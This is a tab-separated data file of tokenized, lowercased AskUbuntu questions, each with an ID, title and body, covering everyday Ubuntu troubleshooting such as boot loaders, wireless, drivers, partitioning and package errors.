437796	remove the newline from a list stored in a text file and read the text file in python	consider the following situation , for example the code is : : list = open ( `` mylist.txt '' ) .readlines ( ) for x in list : f =open ( 'show.sh ' , 'a ' ) f.write ( `` my line `` +x+ '' > temp.txt\n '' ) f.close ( ) where mylist.txt is : math physics chemistry economics if we print the mylist list with python it appears as : [ 'math\n ' , 'physics\n ' , 'chemistry\n ' , 'economics\n ' ] now i want to remove this \n . if we do n't do this the output of python stored in show.sh seems to be : my line math > temp.txt my line physics > temp.txt my line chemistry > temp.txt my line economics > temp.txt but what i need is my line math > temp.txt my line physics > temp.txt my line chemistry > temp.txt my linel economics > temp.txt how to achieve this ?
437798	how to extract aac audio from an mp4 file to m4a	how can i extract the aac audio from an mp4 file ? i tried with ffmpeg and -acodec copy but if i use mp4 as output it will still encode the video and i get the same file size . if i use m4a as output it will somehow still encode the video and i get almost the same filesize . with aac as output i ca n't open the file in puddletag although the file size suggests the video was stripped thanks in advance
437801	ubuntu 12.04 lts nvidia driver mirrors second monitor	i have installed ubuntu 12.04 , without nvidia driver i can use my laptop screen and a second screen over the hdmi port of my laptop . for some reason when i install the nvidia driver 331.20 the second screen which is using the hdmi port is getting a mirrorscreen of my laptop . the nvidia driver also does n't recognize the second screen . but when i enter the ubuntu display setting it show both screen overlapping each other . when i try to put on screen beside the other one and click on apply , both screens turn black and i get logged out but both screens are still mirroring . anyone got a pointer for me how i could fix this ? if any logs needed to better trace my issue please tell me as i 'm new to unix/linux . e : my graphic card is a gt 630m
437802	installing mariadb fails	i am trying to solve this github issue ( vaprobash ) . ( if you got vagrant setup then you could try it out yourself and see the error in more detail . ) the script i am using can be found here : mariadb.sh on github . it 's based on the official installation guide found here , only with 2 added configuration for setting a password of choice . i also tried installing it manually by fallowing the official guide , but that gave me the same result . so far i tried a `` solution '' given here on another askubuntu question . it suggested running sudo apt-get purge mysql* mariadb* , but this did n't help either ( i ran this before fallowing the official installation guide ) . does anyone got a idea what 's going on ? i can post the error 's here , but i rather refer you to the github issue .
437810	synaptics touchpad detected as ps/2 generic mouse on ubuntu 13.10	i have just installed ubuntu 13.10 on my computer ( hp pavilion dv6 ) but i am not able to get work my synaptics touchpad . i launched a xinput -list and i could see that it is installed as ps/2 generic mouse but unable to get ready to work with a xinput set-prop `` device enabled '' 1 gsynaptics also fails to detected it , and i followed this steps with out success . https : //help.ubuntu.com/community/synapticstouchpad other ubuntu 's release also fails and an external mouse works fine . please help me ! ! : ' (
437811	can not connect to university computer via ssh over a vpn connection to my uni . network ?	i need to vpn for happen a ssh connection to my uni . server . both computer powered by ubuntu 13.10 . i am able to establish vpn connection to the network but ssh connection does not repond and gives time out error after a while . i wold like to find the reason and on the which layer of that connection . it is the vpn , of firewall of my computer or the university server . how can i debug my connection with which tool giving the cues about the dispersed connection ? nmap gives host is up ( 0.0077s latency ) . not shown : 997 filtered ports port state service 53/tcp closed domain 80/tcp closed http 443/tcp closed https nmap done : 1 ip address ( 1 host up ) scanned in 19.57 seconds and ping does not give any output
437812	typing ' # ' with a mac uk keyboard ( ubuntu on virtualbox ) ?	i ca n't type the ' # ' character in ubuntu running under virtualbox . the host is a mbp with uk internacional keyboard . in ubuntu , i use the english ( uk , macintosh internacional ) layout . instead of ' # ' , the 'âł ' character shows up ( which under macosx you can type using the option key ) . do you guys know about some fix/workaround ? thanks !
437814	using rsync between 2 ubuntu servers having a folder with space in the name , how to make it work ?	i used rsync alot , but never found out how to copy a folder which had a space in the name . like this : sudo rsync -rv myuseraccount @ 192.168.xxx.xx : /data/svn/my folder /data/svn/ i tried already various versions like : sudo rsync -rv myuseraccount @ 192.168.xxx.xx : '' /data/svn/my folder '' /data/svn/ or sudo rsync -rv myuseraccount @ 192.168.xxx.xx : '' /data/svn/my folder/ '' /data/svn/ whats the correct syntax to copy a folder which has a space in his name ? okay got it : using a ' to escape my shell and backslash for the remote shell sudo rsync -rv 'myuseraccount @ 192.168.xxx.xx : /data/svn/my\ folder/ ' /data/svn/
437821	what auditing information is available for universe repository software packages ?	i understand that the `` masters of the universe '' ( motus ) are responsible for packaging and reviewing/checking software that goes into the universe repository , but there seems to be no formal process for auditing software . motus are community members and `` there are no requirements or exams to pass to become a motu contributor '' . there is a new packages code review guide but the only technical issue mentioned is licencing . what ( presumably ad-hoc ) auditing is done of software packages in universe , if any , and where is that information publicly visible ? i notice that the security team does some auditing . where is that information available ? my specific concern is with the calibre package , but the `` maintainer '' is just a mailing-list , so it seems no-one is accepting responsibility for it and there is no way of finding out what testing ( if any ) was done . is that correct ?
437822	ubuntu touch on archos 80 titanium	i want to install ubuntu touch on my tablet it 's model archos 80 titanium how can i do it ? and is it safe to do this , and can i run android and ubuntu in a dual boot on it and , if possible , how it
437825	can i disable the internal speakers while keeping the audio jack enabled ?	i have ubuntu 13.10 installed on my macbook pro 4,1 and it is working great . the only problem is that my broken speakers let out static all the time . i somehow broke the speakers while i was repasting the heatsinks a while back , and it is n't a big deal in os x or windows 7 because i can easily turn off the internal speakers by muting or plugging in headphones . the same does n't work in ubuntu , and the constant static had me so annoyed that i have added the snd_hda_intel and snd_hda_codec_realtek kernel modules to the blacklist to completely disable sound . does anyone have a solution that will let me still use my headphones for music , just not the internal speakers ?
437827	installed ubuntu 13.10 not found after forced shutdown	couple of days ago , i installed ubuntu 13.10 and i was enjoying it until i wanted to import files from my external hard drive that it suddenly froze for 20 min or so and i forced shutdown my laptop . right after , when i hit the start , the nice statement os not found was in front of my eyes . i tried booting it from usb and even wanted to reinstall it but it said i do n't have enough space which i 'm sure i have 290gb free ! how can i retrieve ubuntu ? is there any chance that my hdd is broke ? ( i changed the bios order to hdd , but nothing 's happened . ) and when i boot from usb why i can not access to my hdd ? i.e . gparted only shows the usb and nothing else ! ( i even tried `` grub-install /dev/sda '' but then it says `` path /boot/grub '' is not readable by grub on boot . installation is impossible.aborting . '' i 'd appreciate any suggestions or help .
437833	how to enlarge the dimming time of the screen saver	before switching off the screen , the screen saver dims the screen a bit . for me , the time of having the screen dimmed is not long enough , so i often have to retype my password . i 'd like to have a longer dim-time . how can i get this ? ( i am not asking for how do you change the amount of time before the screen dims ? )
437834	how can i get a new /etc/apt/sources.list ?	i was trying to modify that file , and then somehow all the contents got deleted ... does anyone know where i can get a new one ? i 'm using ubuntu 11.04 edit : moreover , what had happened was i had changed all the occurrences of 'archive.ubuntu.com ' in that file to 'old-releases.ubuntu.com ' , but then this caused the command sudo apt-get install [ package-name ] to always return with `` can not locate package ... '' , no matter what package name i typed . so i tried to switch all occurrences back to what they originally were , using sed , and that 's when everything in that file disappeared ...
437835	how to stop battery from overcharging ?	i am new to ubuntu , since i switched from windows8 . i have an asus x402c laptop , so i can not remove the battery from it . on windows8 when the battery was fully charged , windows automatically switched to ac adapter . is it possible on ubuntu ?
437836	triple boot win7 , ubuntu , kali	i am running window7 and ubuntu 13.10 together . i 'd like to also have kali linux installed.despite i did the installation of both os , i am not a veteran in this subject , i dont know where to start on and if it is possible with a total hd of 250gb many thanks in advance
437839	ubuntu partitioning and installation error , due to bad hdd sector ( s )	i have a 320gb hdd , which i have formatted , since it ran windows7 earlier . now i see , that the hdd is bad in c : , so i concluded this because , ubuntu gave me an error , that this drive is bad at some point during installation . please guide me as how can i make partition , so that the bad sector ( s ) is/are not used in the installation of ubuntu . i badly need this os . thanks a ton for your help .
437845	`` unable to correct problems , you have held broken packages ''	i keep trying to install the gnome-extensions-user-theme package and i get this every time : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages . thomas @ kindletouch : ~ $ sudo apt-get clean thomas @ kindletouch : ~ $ sudo apt-get install gnome-shell-extensions-user-theme reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages .
437846	need help partitioning a hard disk on a fresh install of ubuntu server	coming from a windows background i am fining myself overwhelmed by the massive amount of totally different resources available when it comes to learning linux ... i have a fresh install of ubuntu server 12.04 , with xrdp and vnc . the install was put on an 80gb drive - the only drive in the machine . i would like to create a partition on this drive , and say split it into 10gb ( for ubuntu ) and the remaining would be for storage of various files . - windows would give me c : and d : for example . i seem to be struggling in finding a 'simple ' step-by-step guide - the terminology between windows and linux is so very different so searching , using keywords i would usually use , yields all sorts of conflicting results . i have installed gparted , though am now stuck.. is there a step by step guide that will show me how to take my 80gb drive and split it into 2 ? thanks
437850	unable to type in password at login screen after restart ?	i am locked out of my laptop after restarting it . when i am in the login screen , i have 3 options : me / registered user guest session remote login when i click on the password field/text box that says log in , or press enter , it disappears . i can only press esc and i am taken back to the 3 options , so i tried to just start typing the password , but nothing happens . what can the problem be ? ubuntu did install some updates and i installed gimp and libimobiledevice . i tried to look for previous questions/answers , but nothing seem to match my problem . can anyone help ? i am a novice here and i do n't want to give up or start from scratch . i have done so much on it already.thank you in advance .
437851	ubuntu sdk open file dialog	i 've started playing with the sdk to start developing an application . the application will be something that will allow me to filter records in an csv file by a search term . but does a file dialog exist so that the file can be located and how do i use it ?
437855	custom unity webapp user script for jango called twice	i created a unity webapp user script for integrating jango website ( a free web radio ) with ubuntu unity ( launcher , media menu , notifications ) . this is the script i created : http : //paste.ubuntu.com/7137581/ package with js + manifest here : unity-webapps-jango.zip to put in this folder : /usr/share/unity-webapps/userscripts/jango the problem is that the script is called twice by the system ... and so the initalization function , that set timeout for checking current song . the effect is that every function is runned twice , and also you see two notifications for song changed . can anyone guess why ? can be caused by the usage of two frames in the website ?
437857	how to check if my software is 32 or 64 bit	i want to check if my software is x64 or x32 bit ( not os ) this software is a executable file and when i check about no information is given if it is 64 or 32 so does anyone knows how to check if my software is x64 or 32 thank you in advanced
437859	how do i adjust dpi in 12.04	i think that i want ( need ? ) to adjust my dpi . qualitatively , text is very small and i usually find myself increasing text size in text editors , web browsers , etc . quantitatively : the 1 '' square here is closer to 1/2 '' . using the monitor size reported by xrandr ( 11.1 '' x6.5 '' ) and my current resolution ( 1920x1080 ) , i find that my dpi should be ~170 . i modified lightdm.conf and the gnome text scaling factor as described in this related question , except that if i used the ratio between my theoretical dpi and 96 ( 1.77 ) as the text scaling factor ( as described in the post ) , it was unusually big . 1.2 seems much more appropriate . the text scaling had an obvious effect , and i think that the menu text changed when i restarted lightdm ( although i expected a more obvious effect from nearly doubling the dpi ) . xdpyinfo and xorg.0.log reflect the updated dpi ( 170 ) , but xrdb indicates 115.2 ( 96*1.2 , my text scaling factor ) . none of these changes affected the square . adjusting the text scale fixes most of the nuisance of having the wrong dpi , but i would prefer that things are `` right '' . should i be doing something else ? i tried changing my resolution , but none of the choices looked right .
437863	grub failing to boot	when i went to boot grub failed and went into grub rescue . i could n't find a boot source from grub rescue and after running boot repair off a live cd when i power on i no longer get to the grub rescue command . i went back into to the live cd and ran the diagnostic in boot repair and got this http : //paste.ubuntu.com/7137064/ i also used , sudo fdisk -l as mentioned on another thread and got an error : fdisk : unable to read /dev/sda : input/output error this issue started randomly and i have n't made any changes to the partitions ( intentionally ) nor have updated recentlyso i 'm starting to think it may be a hardware issue ?
437865	wireless is connected , but ca n't browse the internet ( or connection goes completely )	i 'd like some help with this , please . will be very glad is anyone will point me in the right direction . thank you in advance ! this is when the connection is present and browsing : eth0 link encap : ethernet hwaddr 50:46:5d:4a:9e:4f up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2666 errors:0 dropped:0 overruns:0 frame:0 tx packets:2666 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:228844 ( 228.8 kb ) tx bytes:228844 ( 228.8 kb ) wlan0 link encap : ethernet hwaddr dc:85 : de:1c:91 : f9 inet addr:192.168.1.147 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :de85 : deff : fe1c:91f9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:18780 errors:0 dropped:0 overruns:0 frame:0 tx packets:12817 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:21198762 ( 21.1 mb ) tx bytes:1746891 ( 1.7 mb ) when connection goes : wlan0 link encap : ethernet hwaddr dc:85 : de:1c:91 : f9 up broadcast multicast mtu:1500 metric:1 rx packets:209503 errors:0 dropped:0 overruns:0 frame:0 tx packets:132560 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:268811733 ( 268.8 mb ) tx bytes:15479814 ( 15.4 mb )
437866	grub menu doesnt show	i 've installed ubuntu 13.10 i have only installed ubuntu 1 time before so i 'm a newbie . i had some problems installing , i used nomodeset eventually and it worked ( i dont know what it is , so thats why i tell you ) . but now when i start up ( asus n550lf laptop ) disabling secureboot and enabling csm it launches straight into windows and half of the time it starts crashing and gets in a loop . when i enable secureboot everything works well . but grud doesnt show op in either of the 2 modes , which means i basicly cant get into ubuntu at all . i 've heard i need to get the ubuntu partition right next to the ubuntu one . i 'm not sure if thats the case since my windows partitions where the default one 's ( by asus ) . if this is indeed the problem how can i switch these partitions ; what ( free ? ) programs can i use ? ! [ enter image description here ] [ 1 ] http : //i61.tinypic.com/2lx7ecw.png the picture is my partition configuration ( its dutch ) the 186gb is ubuntu alongside 18gb of swap memory .
437867	force 'uget ' to download from a particular link	i 'm using uget on ubuntu 13.10 , but the problem is that it does n't download from some links automatically . for example , i want to download a file from http : //d-h.st/oni : when i click the download button , the download starts in the browser itself ... i cant find any way to force download it in uget . is there any download manager which can download this file by simply clicking on the download button ? just like `` orbit downloader '' or `` internet download manager '' on windows ? thank you .
437868	put aliases in my dropbox	i have drop-box installed successfully on my machine , however , things i want to share i have to copy into it . large files . if i some well organised directories in my documents , do i really have to drag them into dropbox ? can instead make an alias of the files and paste these aliases into my dropbox folder to share them without moving them ? any risks involved here ? will the other person wipe them from my system ?
437869	wireless internet connection problem	i have a problem connecting to the internet using ubuntu 12.04 i 'm trying to connect to my home router/ap using my lenovo t530 . every other device works just fine on the wifi . also , my t530 works just fine on all and any other wifi except mine . it 's not a router issue , i 've triple checked . i attached data for both connections . one shows data from `` blackxs '' , my wifi that does n't work . the other screenshot is done on the same device just seconds later , on another wifi named `` arbo '' ( my brother 's connection up in the attic ) working just fine . can anyone explain or offer a solution ? working : root @ t530 : /home/augustin # ifconfig wlan0 wlan0 link encap : ethernet hwaddr a4:4e:31:4f : ac:4c inet addr:192.168.1.8 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :a64e:31ff : fe4f : ac4c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13557 errors:0 dropped:1 overruns:0 frame:0 tx packets:18810 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:11021816 ( 11.0 mb ) tx bytes:1781840 ( 1.7 mb ) root @ t530 : /home/augustin # iwconfig wlan0 wlan0 ieee 802.11abgn essid : '' arbo '' mode : managed frequency:2.462 ghz access point : 7a : d1:5e:12:36 : d1 bit rate=1 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=28/70 signal level=-82 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:5 invalid misc:8 missed beacon:0 root @ t530 : /home/augustin # ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.1 : icmp_req=1 ttl=64 time=49.5 ms 64 bytes from 192.168.1.1 : icmp_req=2 ttl=64 time=1.74 ms 64 bytes from 192.168.1.1 : icmp_req=3 ttl=64 time=99.2 ms ^c not working : root @ t530 : /home/augustin # ifconfig wlan0 wlan0 link encap : ethernet hwaddr a4:4e:31:4f : ac:4c inet addr:192.168.0.101 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :a64e:31ff : fe4f : ac4c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:18396 errors:0 dropped:1 overruns:0 frame:0 tx packets:24330 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:14264964 ( 14.2 mb ) tx bytes:3038114 ( 3.0 mb ) root @ t530 : /home/augustin # iwconfig wlan0 wlan0 ieee 802.11abgn essid : '' blackxs '' mode : managed frequency:2.437 ghz access point : 1c:7e : e5:01:0c : f4 bit rate=65 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=70/70 signal level=-26 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:13 invalid misc:3 missed beacon:0 root @ t530 : /home/augustin # ping 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.0.1 ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2014ms
437871	ubuntu boots to terminal on start up help ?	i can log in but want to have a desktop . i installed it in windows 7 i have tried uninstalling and reinstalling and it still did not work .
437875	metacity not showing up in gconf-editor	i just fresh installed 13.10 on a laptop to test out some new stuff . i installed gnome-panel and selected gnome flashback ( no effects ) at log in . i would like to set some key-bindings using gconf-editor . in the past i have run gconf-editor and gone to /apps/metacity/ and found the keybindings options . now , metacity is n't listed under /apps ( but compiz-1 and compizconfig-1 among others are ) . i have also checked dconf-editor but ca n't find it there ( although i may not know the correct place to look ) . i looked in /org/gnome/desktop/wm/keybindings but i am trying to create a keybinding to launch the terminal and that is n't on that list . the reason that i do n't use the system-settings - > keyboard - > shortcut approach is that the keybinding i want to set is `` alt-a '' which must be typed out . if you push alt-a when it asks for a new accelerator it takes you back to `` all settings '' . i believe metacity is running , but i 'm not really sure . ps aux|grep metacity uname 1766 0.3 0.6 185384 13076 ? sl 15:34 0:09 metacity
437878	can not launch .jnlp file in precise pangolin	i 'm trying to install matlab but i ca n't open the download_agent installed from mathworks . it 's an jnlp file , but if i use open with - > icedtea in nautilus nothing happens , and when i try javaws download_agent or javaws download_agent.jnlp i get the message /usr/bin/javaws : line 66 : /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java : no such file or directory when trying sudo apt-get install icedtea-netx it says icedtea-netx is already the newest version . i 'm running the jdk from oracle but tried switching to openjdk using sudo update-alternatives -- config java but it still wo n't work ... always get the message /usr/bin/javaws : line 66 : /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java : no such file or directory any suggestions ? and many thanks !
437879	ubuntu wo n't let me login after software update	i 'm a ubuntu newbie so i 'll try to do my best but i 'll need step by step procedures please . i have 13.10 installed and after last night 's update , i ca n't login . the keyboard is slow to answer and when i type in my password and press enter , the white dots in the background disappear as it always does when it logins but it does n't , it just stays there ... same happens with the guest account . i ca n't seem to open the terminal with ctrlaltt and when i go into ubuntu trusty tahr it does n't recognize my login . i aslo ca n't go on recovery mode by holding shift when i turn on the computer ... .
437880	extract a squashfs to an existing directory	i have an ubuntu installation backed up as a .squashfs file . i would like to extract it to the root of a partition , but when i try gives me an error saying the directory exists . i can extract just fine to non-existent directories . i 've searched for information about using squashfs-tools , but ca n't find what commands would be used to extract to an existing location such as an empty partition . this is the command i 'm using that works for extracting to non-existent locations : sudo unsquashfs -d /media/location1/locationthatdoesntexist /media/location2/file.squashfs i tried using this to extract to an empty partition , but it does n't work : sudo unsquashfs -d /media/location1 /media/location2/file.squashfs sources : http : //www.tldp.org/howto/html_single/squashfs-howto/ # mksqoptions
437882	winefile copy and paste option . ca n't find paste	nothing more to say . i right click a file and i see `` copy '' and `` cut '' then i go to the destination folder , right click , ... where 's paste ? ? ! ! ! i searched the menus on top . nothing . i tried ctrl+v . nothing .
437884	ubuntu does n't install correctly	so when i take my cd put it in my computer and i turn it on or restart i get the default ubuntu screen when i click install ubuntu goes through all the steps and then at the very last step barely do i see it , it comes on and after a few seconds it closes faster then i can even say one letter then a few minutes later or seconds i get a message saying that ubuntu failed to install and that it will boot up a try ubuntu desktop to see if i can find the problem or re install so it boots it and everything is in chinese i do n't know how to read that giberish so i need help on finding how to install my ubuntu correctly either way cd ( 700 mb ) or a sandisk usb stick ( 3 gb ) both of those things are what i have but i do n't think my usb works anymore because of this software when i tried to install ubuntu via usb stick it write protected it . so here is what i 'm asking my questions -how to remove the write protection -how to install ubuntu -how to install ubuntu via usb or cd-r -how to prevent these stupid errors i really need help . i ca n't explain how frustrated i am .
437885	ubuntu 13.10 installed - mouse & keyboard not working	i have installed ubuntu 13.10 on my hp desktop h8-1240 and all looks good except the mouse and key board do n't work . they both work fine on the live installation but when i boot from the hard disk they do n't work . i 'm ready to give up on ubuntu ... help please .
437886	microphone stopped working	i was trying to use my mic in ubuntu 13.10 and it was working fine for a little , then just stopped working . i have tried other thing and they do n't work either , but they work fine on windows . i have tried using audacity and steam and either wo n't work , but i have n't tried skype yet .
437887	driver for hp 2207 display for 12.04	this was already asked last year but there was no answer ! is this an omen ? this is a really common display so there just has to be a way . . . how can i find a driver that will let me use this as a second display to my dell d620 laptop ? i 'm using 12.04 .
437890	usb devices works sometimes	one of my usb plugs works sometimes , not always , its only 1 of the plugs , when i change to another plug , its works ok , laptop is a samsung model np300e4c , no usb3 , just 3 usb2.0 . i ran the lnusb command on the terminal and recognizes the device connected to the plug with the problem , but still sometimes just does't work . any ideas , recommendations or any kind of help would be appreciated thanks in advance
437894	help needed with deleting a ubuntu partition	i have a question about my partitioning . some months ago my laptop crashed , so i decided to put ubuntu on it . because i had some experience with ubuntu 12.04 lts i choose to create a dual-boot with ubuntu 12.04 and ubuntu 13.04 . since i never use ubuntu 13.04 and my ubuntu 12.04 partition is running out of memory i want to delete the 13.04 partition . i am a newbie with these things , so i hoped you guys could help me out . how can i delete the 13.04 partition without losing data from my 12.04 partition ? a screenshot of gparted : how can i see which partition contains which ubuntu version ? and what about the swap partition ? thanks in advance !
437895	how do i install ubuntu-desktop and compiz from root terminal ?	i 've messed up my computer trying to get a game to work because i thought uninstalling compiz would be a brilliant idea . boy oh boy was i wrong . now i get the message `` failed to load session `` ubuntu '' whenever i try to log in . i 've tried accessing a terminal using cltrl-alt-f1 but whenever i try to type in my username and password i get login incorrect . so when the computer starts i hold shift on my keyboard and it loads grub and takes me to this screen with the gnu grub version 2.00-13ubuntu3 at the top . i select advance options for ubuntu and hit enter and then i select ubuntu , with linux 3.8.0-35-generic ( recovery mode ) then press enter . there is an option that says root and i am able to get to a terminal through there . my first question is is it possible to fix my computer through this terminal . my second question is if it is possible what steps do i need to take to fix it ? my third question is what information do you need to help me and how can i access that information ?
437904	skype can not find libsqlite3.so.0	skype fails to run : $ skype skype : error while loading shared libraries : libsqlite3.so.0 : can not open shared object file : no such file or directory i tried reinstalling skype ( apt-get remove then apt-get install ) but it still fails to run . i tried manually installing the lib : $ apt-file search libsqlite3.so.0 libsqlite3-0 : /usr/lib/x86_64-linux-gnu/libsqlite3.so.0 libsqlite3-0 : /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 libsqlite3-0-dbg : /usr/lib/debug/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 $ sudo apt-get install libsqlite3-0 ... libsqlite3-0 is already the newest version . i tried allowing the 32 bit version : sudo dpkg -- add-architecture i386 sudo apt-get update sudo apt-get -f install skype i tried uninstalling and reinstalling skype again . no luck . i notice that through all the of the above , 'apt-get ' never attempted to remove or reinstall the lib . if i try to manually remove the lib , i ca n't : $ sudo apt-get remove libsqlite3-0 ... some packages could not be installed . this may mean that you have requested an impossible situation ... the following packages have unmet dependencies . libatk-wrapper-java : depends : default-jre but it is not going to be installed or java2-runtime libatk-wrapper-java-jni : depends : default-jre but it is not going to be installed or java2-runtime e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i do n't really know what this means , other than it ca n't be removed because some dependencies will be broken . update : as requested : $ apt-cache policy libsqlite3-0 : i386 libsqlite3-0 : i386 : installed : 3.7.17-1ubuntu1 candidate : 3.7.17-1ubuntu1 version table : *** 3.7.17-1ubuntu1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ saucy/main i386 packages 100 /var/lib/dpkg/status update 2 : as requested : $ stat /usr/lib/i386-linux-gnu/libsqlite3.so.0 stat : can not stat â/usr/lib/i386-linux-gnu/libsqlite3.so.0â : no such file or directory i 'm on : ubuntu 13.10 saucy linux aura 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux cpu is intel ( r ) core ( tm ) i7 cpu 920 @ 2.67ghz
437906	installed lubuntu 13.10 alternate on old pentium ii . monitors can not display resolution at boot	i just did a fresh install of lubuntu . once it was finished , i got past post and immediately my monitor said it could not display the resolution ( 1280x1024 monitor ) . i tried my 1920x1080 monitor and it said the timing was incorrect . i 'm a linux novice , so i 'm not sure how to proceed . i get no boot options after post , just a black screen . here 's a video of the issue : http : //www.youtube.com/watch ? v=xzgo13enqqc thanks .
437909	help needed in using lexmark pro705 with ubuntu 13.10	from http : //support.lexmark.com/index ? page=driversdownloads & locale=en & userlocale=en i have downloaded 32 bit printer description and print utility for lexmark pro705 ubuntu 12.04 . these appear to install ok after overriding warnings of bad quality . on creation of printer using print utility , test job is stopped with message cups-insecure-filter-warning . i 've found and followed various advice on this : sudo chmod 777 -r /usr/lib/cups/backend sudo chown -hr root : root /usr/lib/cups/filter/*â sudo chown -hr root : root /usr/lib/cups/backend/*â along with multiple restarts and recreation of print queues . i 've tried both usb and wireless connections . test print jobs continue to stop with message cups-insecure-filter-warning . has anyone managed to get the lexmark prevail pro705 working on ubuntu 13.10 ? any advice greatly appreciated .
437912	no hdmi output option even though hdmi option shows up in pulse audio control - ubuntu 13.10 64bit	checked for the answers earlier but the provided solutions did n't work , there was one question exactly the same as mine but it got no answers . as stated in the subject , the hdmi option shows up in pulse audio config , but i 'm unable to choose it in sound settings . any help greatly appreciated , many thanks in advance . i do n't suppose i have to add that i 'm a complete ubuntu noob : ) pat
437913	indicator-notifications history	i am looking for a way to view all the entries in indicator-notifications . i have it installed already and running . by default , it shows just five recent notifications even when you have more than five in a 'list ' somewhere . like in the screenshot above , how can i see all the 11 notifications at once ?
437914	how to install older gnu lib c ? is this neccessary ?	i am trying to install proprietary ati catalyst drivers on my ubuntu 12.04.1 . every driver on amd 's website says it requires glibc version 2.2 or 2.3 . upon running the ldd -- version command , i have learned that i have version 2.15 . does 2.15 include 2.2/2.3 ? if it does not , what can i do ? can i install that library alongside 2.15 ?
437918	libimobiledevice ca n't transfer images properly to ipad 2 ios7 ( 7.1 11d167 )	i have used this tutorial from itsvoss.com and everything seems to be working quite alright . i can get the ipad 2 to trust the computer - and i can transfer images to the ipad . however , the images does not show up on the ipad ( in the camera roll ) - and i wonder if i 'm doing something wrong . any help would be highly appreciated . thanks in advance . ps : i am using xubuntu 13.10 .
437919	my screen resolution change wil not save ?	i have a destop with 12.10 installed . i haved install all det drivers at it work fine to edit the resolution om my screens . but teh problem is , when i log in to a spacific use user , the resolution cange . i have try to go into go and save et new screen resolution but it will not save ? i had try to save new configuration to etc/x11/xorg.conf thx from norway
437926	ca n't connect to wireless internet on 12.04 with hp pavilion ze2000	i am extremely new to ubuntu and i put it on my hp pavilion ze2000 . it works fine when i plug in the ethernet cable , but it does not find any wireless connections .
437927	format filesystem to work with seperate boot and data drives	i am building a pc and was going to use a small ssd to hold my os and a larger hard drive to store my files on . i was wondering if there was any way for me to move my home folder or mess with my partitions so it would n't just store everything on the ssd and i could actually use the data drive .
437931	possible to create a command to open clementine and have it create a playlist of 50 random songs ?	so i 'm trying to figure out how to make clementine automatically create a playlist of 50 songs from my library when i open it . is this possible ? i 'm using the latest ubuntu btw .
437940	can not mount sd-card in ubuntu 12.10 . message for `` bogus alignment ''	after one of the updates , my ubuntu 12.10 stopped auto-mounting the sd-card in the internal card-reader . it is a samsung q45 laptop , and the card is a typical sony 4gb , which works perfectly on a camera . every time the card is inserted in the card-reader , the following happens : the volume /dev/sdb ( or similar ) does not appear in sudo fdisk -l dmesg gives only one message , appearing 4 times : [ 875.970212 ] sdhci-pci 0000:04:09.2 : will use dma mode even though hw does n't fully claim to support it . the volume does not get auto-mounted , even if the system gets restarted with the card in it . if i run echo 1 > /sys/bus/pci/rescan as root , nothing is mounted still , but dmesg gives this message : [ 1039.733072 ] yenta_cardbus 0000:04:09.0 : bridge configuration invalid ( [ bus 05-04 ] ) , reconfiguring [ 1039.733189 ] i915 0000:00:02.0 : bar 6 : [ ? ? ? 0x00000000 flags 0x2 ] has bogus alignment [ 1039.733207 ] yenta_cardbus 0000:04:09.0 : cardbus bridge to [ bus 05-04 ] [ 1039.733215 ] yenta_cardbus 0000:04:09.0 : bridge window [ io 0x4000-0x40ff ] [ 1039.733226 ] yenta_cardbus 0000:04:09.0 : bridge window [ io 0x4400-0x44ff ] [ 1039.733236 ] yenta_cardbus 0000:04:09.0 : bridge window [ mem 0xc0000000-0xc3ffffff pref ] [ 1039.733247 ] yenta_cardbus 0000:04:09.0 : bridge window [ mem 0xc8000000-0xcbffffff ] any clue what to do in order to further debug this ?
437945	ca n't find copied files	i used cp to copy files to a directory which did n't exist . i have no clue where they went to , and the worst part is it filled up my primary 120gb ssd so i ca n't make any changes to anything . where did the copies go , so i may move them ?
